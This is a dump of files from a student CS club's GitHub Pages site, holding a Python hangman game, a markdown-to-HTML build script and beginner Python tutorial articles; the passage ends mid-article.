"text": "import sys\nimport os\nfrom random import randint\n\ndef clear():\n if sys.platform == \"win32\":\n os.system(\"cls\")\n else:\n os.system(\"clear\")\n\nwords = [\"ant\",\"baboon\",\"badger\",\"bat\",\"bear\",\"beaver\",\"camel\",\"cat\",\"clam\",\"cobra\",\"cougar\",\"coyote\",\"crow\",\"deer\",\"dog\",\n\"donkey\",\"duck\",\"eagle\",\"ferret\",\"fox\",\"frog\",\"goat\",\"goose\",\"hawk\",\"lion\",\"lizard\",\"llama\",\"mole\",\"monkey\",\"moose\",\n\"mouse\",\"mule\",\"newt\",\"otter\",\"owl\",\"panda\",\"parrot\",\"pigeon\",\"python\",\"rabbit\",\"ram\",\"rat\",\"raven\",\"rhino\",\"salmon\",\n\"seal\",\"shark\",\"sheep\",\"skunk\",\"sloth\",\"snake\",\"spider\",\"stork\",\"swan\",\"tiger\",\"toad\",\"trout\",\"turkey\",\"turtle\",\"weasel\",\n\"whale\",\"wolf\",\"wombat\",\"zebra\"]\n\nsecret = words[randint(0, len(words) - 1)]\n\nHANGMANPICS = [\"\"\"\n +---+\n | |\n |\n |\n |\n |\n=========\"\"\", \"\"\"\n +---+\n | |\n O |\n |\n |\n |\n=========\"\"\", \"\"\"\n +---+\n | |\n O |\n | |\n |\n |\n=========\"\"\", \"\"\"\n +---+\n | |\n O |\n /| |\n |\n |\n=========\"\"\", \"\"\"\n +---+\n | |\n O |\n /|\\ |\n |\n |\n=========\"\"\", \"\"\"\n +---+\n | |\n O |\n /|\\ |\n / |\n |\n=========\"\"\", \"\"\"\n +---+\n | |\n O |\n /|\\ |\n / \\ |\n |\n=========\"\"\"]\n\ncorrect_letters = []\nincorrect_letters = []\n\ndef prompt_user():\n # For now, take it for granted that \"TEST\".lower()\n # will return \"test\".\n letter = input(\"Enter your guess: \").lower()\n if len(letter) != 1:\n print(\"Your guess must only be one letter!\")\n return prompt_user() # We prompt the user again\n elif letter < 'a' or letter > 'z':\n print(\"Your guess must be an English letter!\")\n return prompt_user()\n return letter\n\ndef check_guess(letter):\n if letter in correct_letters or letter in incorrect_letters:\n # There's a better way of doing this, which\n # I'll introduce another time, but for now, None is not\n # a bad way to indicate that the letter's been guessed before.\n return None\n if letter in secret:\n correct_letters.append(letter)\n return True # Correct guess\n incorrect_letters.append(letter)\n return False # Incorrect guess\n\ndef unique_letters(word):\n unique = []\n for i in word:\n if not (i in unique):\n unique.append(i)\n return unique\n\ndef win_condition():\n if len(incorrect_letters) == len(HANGMANPICS) - 1:\n return False # User has lost\n if len(correct_letters) == len(unique_letters(secret)):\n return True # User has won\n return None # User has neither won or lost. Game is still going.\n\n\ndef win_screen():\n print(HANGMANPICS[len(incorrect_letters)])\n print(\"You won! The secret word was: \" + secret)\n\ndef lose_screen():\n print(HANGMANPICS[-1])\n print(\"You lost! 
The secret word was: \" + secret)\n\ndef print_incorrect_guesses():\n if incorrect_letters != []:\n print(\"Incorrect guesses: \" + \", \".join(incorrect_letters))\n\ndef print_secret_word():\n print(\"Word: \", end=\"\")\n for i in secret:\n if i in correct_letters:\n print(i, end=\" \")\n else:\n print(\"_\", end=\" \")\n print()\n\ndef start_game():\n if win_condition() != None:\n if win_condition():\n win_screen()\n return\n else:\n lose_screen()\n return\n print(HANGMANPICS[len(incorrect_letters)])\n print_incorrect_guesses()\n print_secret_word()\n guess = prompt_user()\n clear()\n is_correct = check_guess(guess)\n if is_correct == None:\n print(\"You've already made the guess \" + guess + \"!\")\n elif not is_correct:\n print(guess + \" was incorrect!\")\n else:\n print(guess + \" was a good guess!\")\n start_game()\n\nclear()\nstart_game()\n"
},
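One design note on hangman.py above: `start_game` recurses on every guess, so a long enough game could, in principle, hit Python's default recursion limit (about 1000 frames). A sketch of the same control flow written iteratively, reusing the helpers defined in the file:

```python
# Iterative variant of start_game: identical behavior, but the call stack
# no longer grows per guess. Assumes the helper functions from hangman.py.
def start_game():
    while win_condition() is None:
        print(HANGMANPICS[len(incorrect_letters)])
        print_incorrect_guesses()
        print_secret_word()
        guess = prompt_user()
        clear()
        is_correct = check_guess(guess)
        if is_correct is None:
            print("You've already made the guess " + guess + "!")
        elif not is_correct:
            print(guess + " was incorrect!")
        else:
            print(guess + " was a good guess!")
    if win_condition():
        win_screen()
    else:
        lose_screen()
```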
{
"alpha_fraction": 0.650620698928833,
"alphanum_fraction": 0.6529009342193604,
"avg_line_length": 30.576000213623047,
"blob_id": "b51fdc796a4bf1c9bdf5fd6d7e26bb365ea64915",
"content_id": "a04e15cbf81567054193c018b421baf8059dd9cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3949,
"license_type": "no_license",
"max_line_length": 210,
"num_lines": 125,
"path": "/build.py",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "import os\nfrom os.path import join, exists\nfrom xml.etree import ElementTree as ET\nimport json\n\nimport markdown\nfrom markdown.treeprocessors import Treeprocessor\nfrom markdown.postprocessors import Postprocessor\nfrom markdown.extensions import Extension, fenced_code\n\nbase_url = \"http://cyfaircs.github.io/\"\n\ndata_js = []\n\nclass UnderlineProcessor(Treeprocessor):\n\tdef run(self, root):\n\t\tfor anchor in root.iter(\"a\"):\n\t\t\tanchor.attrib[\"class\"] = anchor.attrib.get(\"class\", \"\") + \" underline\"\n\nclass BoilerplateProcessor(Postprocessor):\n\tdef __init__(self, root, file):\n\t\tself.root = root\n\t\tself.file = file\n\t\twith open(join(self.root, \"meta.json\"), \"r\") as f:\n\t\t\tself.meta = json.loads(f.read())\n\n\tdef in_data_js(self):\n\t\tfor article in data_js:\n\t\t\tif article[\"Link\"] == self.root:\n\t\t\t\treturn True\n\t\treturn False\t\t\n\n\tdef add_to_data_js(self):\n\t\tif not self.in_data_js():\n\t\t\tnew = {\n\t\t\t\"Name\": self.meta[\"cover\"][\"name\"],\n\t\t\t\"Description\": self.meta[\"cover\"][\"description\"],\n\t\t\t\"Link\": self.root,\n\t\t\t\"Date\": self.meta[\"cover\"][\"date\"],\n\t\t\t}\n\t\t\tdata_js.append(new)\n\n\tdef run(self, text):\n\t\tself.add_to_data_js()\n\t\treturn self.generate_html(text)\n\n\tdef generate_table_of_contents(self):\n\t\tif self.meta.get(\"series\") == None:\n\t\t\treturn \"\"\n\t\thtml = \"<ul id='tableOfContents'>\"\n\t\tfor v, k in self.meta[\"series\"].items():\n\t\t\tif k == self.file:\n\t\t\t\thtml += \"<li><a class='selected'>\" + v + \"</a></li>\"\n\t\t\telse:\n\t\t\t\thtml += f\"<li><a href='{k}' class='underline'>\" + v + \"</a></li>\"\t\t\t\t\n\t\thtml += \"</ul>\"\n\t\treturn html\n\n\tdef get_file_title(self):\n\t\tif self.meta.get(\"series\") == None:\n\t\t\treturn self.meta[\"cover\"][\"name\"]\n\t\tfor title, file in self.meta[\"series\"].items():\n\t\t\tif self.file == file:\n\t\t\t\treturn title\n\n\tdef generate_html(self, text):\n\t\treturn f\"\"\"<!DOCTYPE html>\n<html>\n{self.generate_head()}\n<body>\n<header>\n<a class=\"underline\" href=\"../../index.html\">←</a>\n</header>\n{self.generate_table_of_contents()}\n<article>\n{text}\n</article>\n</body>\n</html>\"\"\"\n\n\tdef generate_head(self):\n\t\treturn f\"\"\"<head><meta charset='utf-8'>\n<meta http-equiv='X-UA-Compatible' content='IE=edge'>\n<title>LSC CS</title>\n<meta name='viewport' content='width=device-width, initial-scale=1'>\n<meta content=\"{self.get_file_title()}\" property=\"og:title\">\n<meta content=\"{self.meta[\"cover\"][\"description\"]}\" property=\"og:description\">\n<meta content=\"{base_url + f\"{self.root}/{self.file}\"}\" property=\"og:url\">\n<meta content=\"{base_url + f\"{self.root}/cover.png\"}\" property=\"og:image\">\n<meta content=\"#32CCFF\" property=\"theme-color\">\n<link href=\"https://fonts.googleapis.com/css?family=Open+Sans\" rel=\"stylesheet\">\n<link rel=\"stylesheet\" type=\"text/css\" href=\"../../base.css\">\n<link rel=\"stylesheet\" media=\"screen\" type=\"text/css\" href=\"../monokai.css\">\n<link rel=\"stylesheet\" media=\"print\" type=\"text/css\" href=\"../friendly.css\">\n<link rel='stylesheet' type='text/css' href='../article.css'>\n</head>\"\"\"\n\nclass MyExtensions(Extension):\n\tdef __init__(self, root, file):\n\t\tself.root = root\n\t\tself.file = file\n\n\tdef extendMarkdown(self, md):\n\t\tmd.postprocessors.register(BoilerplateProcessor(self.root, self.file), \"bp\", 1)\n\t\tmd.treeprocessors.register(UnderlineProcessor(), \"underline\", 1)\n\ndef 
build():\t\n\tfor root, _, files in os.walk(\"articles/\"):\n\t\tfor file in files:\n\t\t\tif file.endswith(\".md\"):\n\t\t\t\tfile_path = join(root, file)\n\t\t\t\twith open(file_path, \"r\", encoding=\"utf-8\") as md_file:\n\t\t\t\t\thtml_file_name = file.replace(\".md\", \".html\")\n\t\t\t\t\twith open(join(root, html_file_name), \"w+\", encoding=\"utf-8\") as html_file:\n\t\t\t\t\t\textension_configs = {\n\t\t\t\t\t\t\t\"codehilite\": {\n\t\t\t\t\t\t\t\t\"guess_lang\": False,\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t}\n\t\t\t\t\t\thtml_file.write(markdown.markdown(md_file.read(), extensions=[MyExtensions(root, html_file_name), \"toc\", \"codehilite\", \"tables\", \"md_in_html\"], extension_configs=extension_configs, output_format=\"html5\"))\n\twith open(\"data.js\", \"w+\") as f:\n\t\tf.write(f\"let Articles = {json.dumps(data_js)}\")\nif __name__ == \"__main__\":\n\tbuild()\n\tprint(\"Site built\")\n"
},
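build.py drives python-markdown with the `codehilite` extension, which is what the `:::python` markers in the articles switch on. A stripped-down sketch of that conversion step, minus the site-specific extension (assumes the `markdown` package, plus `pygments` for actual highlighting):

```python
# Minimal sketch of the markdown -> HTML conversion build.py performs.
# The :::python line is codehilite's language hint for indented blocks.
import markdown

src = "\t:::python\n\tprint('Hello World!')"
html = markdown.markdown(
    src,
    extensions=["codehilite"],
    extension_configs={"codehilite": {"guess_lang": False}},
)
print(html)  # a <div class="codehilite"> wrapping highlighted <pre> markup
```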
{
"alpha_fraction": 0.7489639520645142,
"alphanum_fraction": 0.7531081438064575,
"avg_line_length": 146.48147583007812,
"blob_id": "ff7f123d4d2076359d920da15f5c08292c541fee",
"content_id": "3316b68aaec4c27d59c56e77b1e3d3cc7b2c4e67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 7965,
"license_type": "no_license",
"max_line_length": 724,
"num_lines": 54,
"path": "/articles/intro/index.html",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<html>\n<head><meta charset='utf-8'>\n<meta http-equiv='X-UA-Compatible' content='IE=edge'>\n<title>LSC CS</title>\n<meta name='viewport' content='width=device-width, initial-scale=1'>\n<meta content=\"Why Python?\" property=\"og:title\">\n<meta content=\"An introductory project to showcase Python\" property=\"og:description\">\n<meta content=\"http://cyfaircs.github.io/articles/intro/index.html\" property=\"og:url\">\n<meta content=\"http://cyfaircs.github.io/articles/intro/cover.png\" property=\"og:image\">\n<meta content=\"#32CCFF\" property=\"theme-color\">\n<link href=\"https://fonts.googleapis.com/css?family=Open+Sans\" rel=\"stylesheet\">\n<link rel=\"stylesheet\" type=\"text/css\" href=\"../../base.css\">\n<link rel=\"stylesheet\" media=\"screen\" type=\"text/css\" href=\"../monokai.css\">\n<link rel=\"stylesheet\" media=\"print\" type=\"text/css\" href=\"../friendly.css\">\n<link rel='stylesheet' type='text/css' href='../article.css'>\n</head>\n<body>\n<header>\n<a class=\"underline\" href=\"../../index.html\">←</a>\n</header>\n<ul id='tableOfContents'><li><a class='selected'>Why Python?</a></li><li><a href='index1.html' class='underline'>Intro to Python</a></li><li><a href='index2.html' class='underline'>What If</a></li><li><a href='index3.html' class='underline'>Data Types</a></li><li><a href='index4.html' class='underline'>Loops and Functions</a></li><li><a href='index5.html' class='underline'>Hangman</a></li></ul>\n<article>\n<p><img alt=\"\" src=\"cover.png\"></p>\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: July 5, 2021</figcaption>\n\n<h1 id=\"why-python\">Why Python?</h1>\n<p>Before starting the main event, I'd like to write a sort of preface, that answers the basic questions which will surround this series. Why did I choose Python? Why are we making Hangman? And what's the plan after this series?</p>\n<h2 id=\"the-goal\">The Goal</h2>\n<p>As will be restated in the next article, the goal of thise series is to get members to write their first game, completely on their own pace, and without any prior programming experience. So, now the question is, why am I choosing this approach, and what even is that approach?</p>\n<h2 id=\"why-python_1\">Why Python?</h2>\n<p>If you're a little bit familiar with programming, you may roughly understand that there are several different programming languages we, as programmers, can choose from. Without going into too much detail, what makes each programming language unique is the circumstances in which they're made for. C++, the language taught to students at CyFair for CS Majors, is primarily used for developing native projects, that is, projects which are run directly by the operating system. It also gives programmers the ability to manage memory directly, instead of being handled by the language itself.</p>\n<p>C++ is not the only language that allows for these two features, so that's not all which makes it unique. There's also the standard library, the build tools, the syntax and semantics, and so on and so forth. If you don't understand what all that means, do not worry, this course is not about C++!</p>\n<p>Instead, it'll be going over Python. The reasoning for this, is that Python is more beginner friendly. This does not make it a toy, however. Python is extensively used in real world projects in all sorts of various fields, especially data science, and to an extent, game development. 
It's even what's used to make <a class=\" underline\" href=\"https://github.com/lonestarcyfair/lonestarcyfair.github.io/blob/main/build.py\">this site</a> stylish!</p>\n<p>Python is also much easier to run compared to C++. Recall, that C++ produces programs which are run by the operating system. That means that programs produced by C++ are OS-dependent. If your friend has a mac, and you've made your program on Windows, you will not be able to share your program with them, unless they build the project on their system. Python, on the other hand, installs what's called an interpreter, and that is the program that <em>runs</em> your code. Thus, all your python programs depend on the interpreter rather than operating system, and as long as your neighbor has the interpreter installed, regardless of what OS they're running, they should be able to run your program without any hassle.</p>\n<p>Keep in mind that all languages have their pros and cons. Python is more fit as an introductory language, and is faster to develop on compared to C++, which is why we'll be using it. C++ offers other benefits, such as performance, and the fact that it is OS-dependent, means there is no requirement to install an interpreter to run C++ programs.</p>\n<h2 id=\"why-hangman\">Why Hangman?</h2>\n<p>Game development takes a tremendous amount of time, and as games scale, so does development time. I, however, don't want you to keep waiting, and I'd rather make it possible to make your first game within a week.</p>\n<p>The game itself, Hangman, is not sophisticted to program. It, in fact, would likely take an experienced programmer less than an hour to program. That is why it's the perfect project.</p>\n<p>It is our goal that you understand every part of the game, and as such, I'll be introducing each concept in the next series of articles, and you'll see every single one applied to make the game. I hope that with this project knocked out, you'll feel ready to make your next game completely on your own, whether it be Hangman: The Electric Boogaloo, a text adventure, or even an RPG game.</p>\n<h2 id=\"whats-coming-afterwards\">What's Coming Afterwards?</h2>\n<p>Developing your own game! But ok, you want to make the next big leap, how do you do that?</p>\n<p>The plan is that after this series is written, I'll work on another series introducing PyGame, a python module which allows you to make your own \"actual\" game, i.e. one that has a window which you can interact with using a mouse.</p>\n<p>However, since I am the sole author of all these articles, and considering the amount of time each one takes to write, it's questionable when I'll be able to finish the next series. It's possible that I could knock it out this summer, but it might have to wait until Spring break as I'm starting a new internship. Regardless, I hope this series alone will be enough to put you on the map so to speak, so that even in the event where the next series won't come out, you'll be able to continue to grow your knowledge through other means.</p>\n<h2 id=\"how-do-i-grow-my-knowledge-through-other-means\">How Do I Grow My Knowledge Through Other Means?</h2>\n<p>There's a rule of thumb that every programmer should go by. To my knowledge, all mainstream programming language have the goal of being easy to learn. As in, the authors of each language will write as much as they can to encourage new programmers to learn their language. They do this through the means of documentation, and Python is no exception. 
Right here, <a class=\" underline\" href=\"https://docs.python.org/3/\">https://docs.python.org/3/</a>, contains everything you need to know about Python, and not only that, but it contains 100x more.</p>\n<p>You want to learn PyGame too? Fear not, just like how authors of languages want to make it easy for you to learn said languages, authors of libraries have a similar goal! <a class=\" underline\" href=\"https://www.pygame.org/docs/\">https://www.pygame.org/docs/</a>, within this site, you'll find all the documentation and tutorials that you'll need.</p>\n<p>Still want more? <a class=\" underline\" href=\"https://www.google.com\">Google</a>, <a class=\" underline\" href=\"https://stackoverflow.com/\">Stackoverflow</a>, and so many other sites and forums can suppliment your learning experience. All you have to be is willing to read and willing to try. I wish you luck on your journey, and with that, I hope you enjoy the next few articles!</p>\n<p>When you're ready, you can read start reading the <a class=\" underline\" href=\"index1.html\">next</a> article.</p>\n</article>\n</body>\n</html>"
},
{
"alpha_fraction": 0.7756049036979675,
"alphanum_fraction": 0.7774279117584229,
"avg_line_length": 133.08888244628906,
"blob_id": "b23a40100d164f6d3579f82599ed0a764b42b95a",
"content_id": "02ac1a4e56d67e3be7b3b0f37a3763ffd1a20b3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6034,
"license_type": "no_license",
"max_line_length": 710,
"num_lines": 45,
"path": "/articles/intro/index.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: July 5, 2021</figcaption>\n\n# Why Python?\n\nBefore starting the main event, I'd like to write a sort of preface, that answers the basic questions which will surround this series. Why did I choose Python? Why are we making Hangman? And what's the plan after this series?\n\n## The Goal\nAs will be restated in the next article, the goal of thise series is to get members to write their first game, completely on their own pace, and without any prior programming experience. So, now the question is, why am I choosing this approach, and what even is that approach?\n\n## Why Python?\nIf you're a little bit familiar with programming, you may roughly understand that there are several different programming languages we, as programmers, can choose from. Without going into too much detail, what makes each programming language unique is the circumstances in which they're made for. C++, the language taught to students at CyFair for CS Majors, is primarily used for developing native projects, that is, projects which are run directly by the operating system. It also gives programmers the ability to manage memory directly, instead of being handled by the language itself.\n\nC++ is not the only language that allows for these two features, so that's not all which makes it unique. There's also the standard library, the build tools, the syntax and semantics, and so on and so forth. If you don't understand what all that means, do not worry, this course is not about C++!\n\nInstead, it'll be going over Python. The reasoning for this, is that Python is more beginner friendly. This does not make it a toy, however. Python is extensively used in real world projects in all sorts of various fields, especially data science, and to an extent, game development. It's even what's used to make [this site](https://github.com/lonestarcyfair/lonestarcyfair.github.io/blob/main/build.py) stylish!\n\nPython is also much easier to run compared to C++. Recall, that C++ produces programs which are run by the operating system. That means that programs produced by C++ are OS-dependent. If your friend has a mac, and you've made your program on Windows, you will not be able to share your program with them, unless they build the project on their system. Python, on the other hand, installs what's called an interpreter, and that is the program that *runs* your code. Thus, all your python programs depend on the interpreter rather than operating system, and as long as your neighbor has the interpreter installed, regardless of what OS they're running, they should be able to run your program without any hassle.\n\nKeep in mind that all languages have their pros and cons. Python is more fit as an introductory language, and is faster to develop on compared to C++, which is why we'll be using it. C++ offers other benefits, such as performance, and the fact that it is OS-dependent, means there is no requirement to install an interpreter to run C++ programs.\n\n## Why Hangman?\nGame development takes a tremendous amount of time, and as games scale, so does development time. I, however, don't want you to keep waiting, and I'd rather make it possible to make your first game within a week.\n\nThe game itself, Hangman, is not sophisticted to program. It, in fact, would likely take an experienced programmer less than an hour to program. 
That is why it's the perfect project.\n\nIt is our goal that you understand every part of the game, and as such, I'll be introducing each concept in the next series of articles, and you'll see every single one applied to make the game. I hope that with this project knocked out, you'll feel ready to make your next game completely on your own, whether it be Hangman: The Electric Boogaloo, a text adventure, or even an RPG game.\n\n## What's Coming Afterwards?\nDeveloping your own game! But ok, you want to make the next big leap, how do you do that?\n\nThe plan is that after this series is written, I'll work on another series introducing PyGame, a python module which allows you to make your own \"actual\" game, i.e. one that has a window which you can interact with using a mouse.\n\nHowever, since I am the sole author of all these articles, and considering the amount of time each one takes to write, it's questionable when I'll be able to finish the next series. It's possible that I could knock it out this summer, but it might have to wait until Spring break as I'm starting a new internship. Regardless, I hope this series alone will be enough to put you on the map so to speak, so that even in the event where the next series won't come out, you'll be able to continue to grow your knowledge through other means.\n\n## How Do I Grow My Knowledge Through Other Means?\nThere's a rule of thumb that every programmer should go by. To my knowledge, all mainstream programming language have the goal of being easy to learn. As in, the authors of each language will write as much as they can to encourage new programmers to learn their language. They do this through the means of documentation, and Python is no exception. Right here, [https://docs.python.org/3/](https://docs.python.org/3/), contains everything you need to know about Python, and not only that, but it contains 100x more.\n\nYou want to learn PyGame too? Fear not, just like how authors of languages want to make it easy for you to learn said languages, authors of libraries have a similar goal! [https://www.pygame.org/docs/](https://www.pygame.org/docs/), within this site, you'll find all the documentation and tutorials that you'll need.\n\nStill want more? [Google](https://www.google.com), [Stackoverflow](https://stackoverflow.com/), and so many other sites and forums can suppliment your learning experience. All you have to be is willing to read and willing to try. I wish you luck on your journey, and with that, I hope you enjoy the next few articles!\n\nWhen you're ready, you can read start reading the [next](index1.html) article.\n"
},
{
"alpha_fraction": 0.7684982419013977,
"alphanum_fraction": 0.7723073959350586,
"avg_line_length": 98.05660247802734,
"blob_id": "bbd6e25c69673752762823f6c724f0fe28b48f6c",
"content_id": "00161c97479d4bb51bf2a4110497c3ca7597ad04",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 10501,
"license_type": "no_license",
"max_line_length": 680,
"num_lines": 106,
"path": "/articles/week2/index.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "\n# How should I start?\n\nHello folks! Firstly, I want to announce, that in the last week alone, we've had 29 new students enroll in our club! I want to thank the student life for making this possible, and the CyFair students for their willingness to try something new. Prior to that week, including the officers and I, we had 39 students in the server, at least 16 of whom were active at one point or another. I asked for an active community, and that is what I'm getting. I'm grateful for it, and I'll be making sure I do my part until the last day of the semester.\n\nAs I've promised, this club will be welcoming to people, regardless of their skill level, As such, this article will be for anyone who has no experience with programming but wants to get started.\n\nSpecifically, I'll be addressing these questions:\n\n* What's a programming language? (TL;DR a specific way to tell the computer what to do)\n\n* Which language should I program in? (TL;DR Python, but read more if you're curious about other options)\n\n* Which videos/books/sites should I follow? (TL;DR Depends on the language)\n\n* How do I practice programming? (TL;DR Games, coding challenges, standard applications, etc.. Read more for specific ideas.)\n\n## What's a Programming Language?\n\nIn the computer world, there are two parts. There is hardware, and there is software. You can literally throw your hardware out the window, because all hardware has mass. It's your case, monitor, graphics card, CPU, anything that you can touch. That said, please don't try throwing anything out your window.\n\nOn the other hand, software is (mostly) everything else, that is your operating system, this website, all the programs you've installed, and so on. Electrical engineers specialize with hardware, computer scientists specialize in software, and computer engineers specialize in their overlap. Very often, electrical engineers don't work alone when developing hardware, but work with computer sciensts and computer engineers as well.\n\nNow, you likely already have a computer, and the computer has all the hardware it needs. How do you tell it what to do? That is, in essence what the job of a programming *language* is; to communicate with a computer. I won't talk in depth about how that occurs, especially since that varies with each language. Instead, I'll provide you with examples and enough simple details so that you know which language is best for you. If you choose to stick with it, you will eventually learn how the language itself works.\n\n## Which Language Should I Program In?\n\nAs mentioned in the TL;DR above, if in doubt, go with Python. It's by far the easiest to understand and program in. Plus, even it doesn't end up being the most fitting for you, a lot of programming knowledge can be transferred when transitioning to another language. And if you program for long enough, you'll likely learn every single language listed below in time. With that said, more on how to learn Python in the next section.\n\nHowever, if you want to consider starting in other languages, here's your guide for that. If you want to:\n\n* take CS classes at CyFair: C++, then Java\n\n* learn the interworkings of a computer: C (not to be confused with C++)\n\n* write games: more on that next paragraph\n\n* learn cybersecurity: Python *and* C\n\n* write websites: Javascript (with HTML and CSS)\n\n* share *code* easily: Python\n\n* share *programs* easily: C++\n\n* share *both* easily: Javascript\n\nOk, let's talk about game development. 
Most games are written using a game engine. You might've heard of Unity, Unreal Engine, CryEngine, Frostbite, and so on. Their logos will usually appear at the start of a game. Using a game engine, is the most practical and sane way of writing a game, as without one, a lot more months, if not years of work, would need to go into developing the most generic of game, and I am not exaggerating. So, if you plan to use a game engine, I advise you to do your research, pick your engine, then learn the langauge the engine is using *before* you use the engine. As a brief rundown:\n\n* Unity uses C#\n\n* Unreal uses C++\n\n* Godot uses GDScript, which is very similar to Python (it can also use C# and C++, but because they're less used in Godot, learning Godot with C# or C++ can be more challenging)\n\nPersonally, I found Godot to be the most user friendly, but regardless, if this is the route you wish to pursue, learn the language of the engine you plan to go with, and learn it before you use the engine. It will make your life much easier in the long run.\n\nIf you do not plan to use a game engine, you really only need a language which can run fast. Python won't do the trick, but languages like C++ and C# are battleground tested for this sort of thing. Celeste, for example, was made using C# without a game engine (they used Monogame, which is a library). Do note, however, that if you're going to make a game without an engine, that usually means you'll have to write a lot of your own tools and libraries, effectively making your own game engine. That is why C++ and C# make effective languages for this option, because they are in fact used to write game engines themselves.\n\n## Which videos/books/sites should I follow?\n\nBefore I share any resources, a word of caution regarding videos. They can be very easy to binge. That can be good, but often what will end up happen is, you'll finish a whole playlist and think you've learned a ton, but by the time you work on your first project, you'll realize how little in fact you've retained. This is simply due to a lack of practice, which we'll talk more about in the next section.\n\nAnother note, you'll find that some people use different programs than others. That's fine, the tools each person uses is completely irrelevant to your understanding of the langauge. Keep that in mind as you learn, and if you have a question regarding a tool someone uses, feel free to message me. For now, here are the resources I'll be recommending (feel free to mix and match, but **focus on one language!**)\n\nFor Python:\n\n* [Derek Banas](https://www.youtube.com/watch?v=nwjAHQERL08) teaches Python by covering material then testing you on it right after. It's one way to mitigate the binging problem stated earlier, which is why I recommend him.\n\n* [Corey Schafer](https://www.youtube.com/playlist?list=PL-osiE80TeTskrapNbzXhwoFUiLCjGgY7) also does a great job teaching, although I don't recall him having practice problems. Regardless, his explanations are really good, so I have him listed here.\n\n* If you prefer books to videos, while I've not read it myself, I've heard great things about [Automate the Boring Stuff With Python](https://automatetheboringstuff.com/). 
The book is completely free online, and also provides the option of a physical copy, which you can buy from their [site](https://nostarch.com/automatestuff2) or [Amazon](https://www.amazon.com/Automate-Boring-Stuff-Python-2nd/dp/1593279922) (if you buy from their site, you get the PDF as well).\n\n* And of course, the official website of [Python](https://wiki.python.org/moin/BeginnersGuide), which links to other resources, and even lets you learn Python completely on the web without installing anything.\n\nFor C++:\n\n* [Cherno](https://www.youtube.com/watch?v=18c3MTX0PK0&list=PLlrATfBNZ98dudnM48yfGUldqGD0S4FFb&index=1), who used to work at EA as a game engine programmer, is an excellent teacher and programmer. Many times he'll go under the hood and show what the computer is actually doing. He also has a series where he develops a game engine from the bottom up.\n\n* [Javidx9](https://www.youtube.com/watch?v=E7CxMHsYzSs) takes another approach, which is by writing and explaining many small C++ projects, allowing for a great opportunity for someone to practice implementing the projects which he implements, or to take them further and improve upon them. He uses his own library to allow for very easy rendering on the console.\n\n* If you want a book, unfortunately, I don't know which one to recommend. Personally, I read [Tour of C++](https://www.amazon.com/Bjarne-Stroustrupand-Depth-Addison-Wesley-Professional/dp/B07VKBLS4Y/), written by the author of the language, but it's definitely not for beginners, even though it's a great book.\n\nI'll be adding resources here for Java or C# or a game engine if they're requested enough. I'm getting exhausted!\n\n## How Do I Practice Programming?\n\nYou have the videos, the books, the articles, now how do you practice? Well, if any of these things have practice built into them, then that's awesome. If not, here's what I recommend:\n\n* if you would like to solve small CS or computational problems: [Project Euler](https://projecteuler.net/archives) or [HackerRank](https://www.hackerrank.com/) make good websites. \n\n* If you wish to see common problems solved in a language of your choosing: [Rosetta Code](https://www.rosettacode.org/wiki/Rosetta_Code).\n\n* If you would like to work on a slightly bigger project: Write a small game such as tic tac toe, snake, soduku logical checker, hangman, text adventure, etc...\n\n* Follow along these articles! I'll be writing about interesting algorithms, and I recommend you try to implement them.\n\n* Going with the spirit of the book mentioned earlier, automate the boring stuff. Try fun things, like downloading cat images until its told to stop, or make discord bots which kicks anyone with the name \"Amr,\" or write a tournament tracking system. Anything you can think of, even if you don't _need_ it, write it for the sake of practice.\n\n* Finally, if you're feeling confident, tackle on a big project. Make an RPG, or your personal website, anything that you can put your all-in into.\n\nAs a final word of advice, do not go into any project or challenge expecting that you have to solve them or finish them. The point of practice is that you learn what you're capable of, and how you can learn more. I've listed all these resources as a start for y'all, but I personally had to go through many trials and errors to find these resources, as I've learned how to ask questions and where to find their answers. 
Regardless of how many more resources I list here, you will have to go through the same phase of learning I went through, as you'll encuonter your own unique problems, and technology is inevitably going to change and the materials here will become out of date.\n\nWith that said, I hope I've provided plenty! You get in what you put out, so it's going to take a time investment. Good luck on your adventures!\n\n---\n\n"
},
{
"alpha_fraction": 0.7150806784629822,
"alphanum_fraction": 0.7217584848403931,
"avg_line_length": 48.91666793823242,
"blob_id": "74118e87bc2767da20bcee2ef68bcd5bf347ad57",
"content_id": "4ddfe1c20ed207772c3247562459446d743daedb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3594,
"license_type": "no_license",
"max_line_length": 436,
"num_lines": 72,
"path": "/articles/intro/index2.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: June 6, 2021</figcaption>\n\n# What If\n\nIf you've not read the previous article, I encourage you to go [back](index1.html) and read it.\n\nSo far, the programs we've written have been very straightforward. Regardless of the input, the same code was to be executed. However, most of the programs we'd like to write are not this simple.\n\n## If Statement\n\nSay we're developing a website, and we want to check the user's age to validate whether or not they are above 13 years old. Of course, this system is commonly cheated, but nonetheless, it makes a simple example of the if statement. Here's how we'd do that:\n\n\t:::python\n\tage = int(input(\"How old are you? \"))\n\tif age >= 13:\n\t\tprint(\"Welcome!\")\n\tif age < 13:\n\t\tprint(\"You're not allowed to sign up! But feel free to come back when you're older :)\")\n\nI won't go too much into the formal syntax, since this should be easy to understand on its own. If the given age is greater than *or equal to* 13, `>=`, we print \"Welcome!\". Note the indendation, this is telling Python that this line only runs if the if statement is true. The colon, `:`, tells python to *expect* an 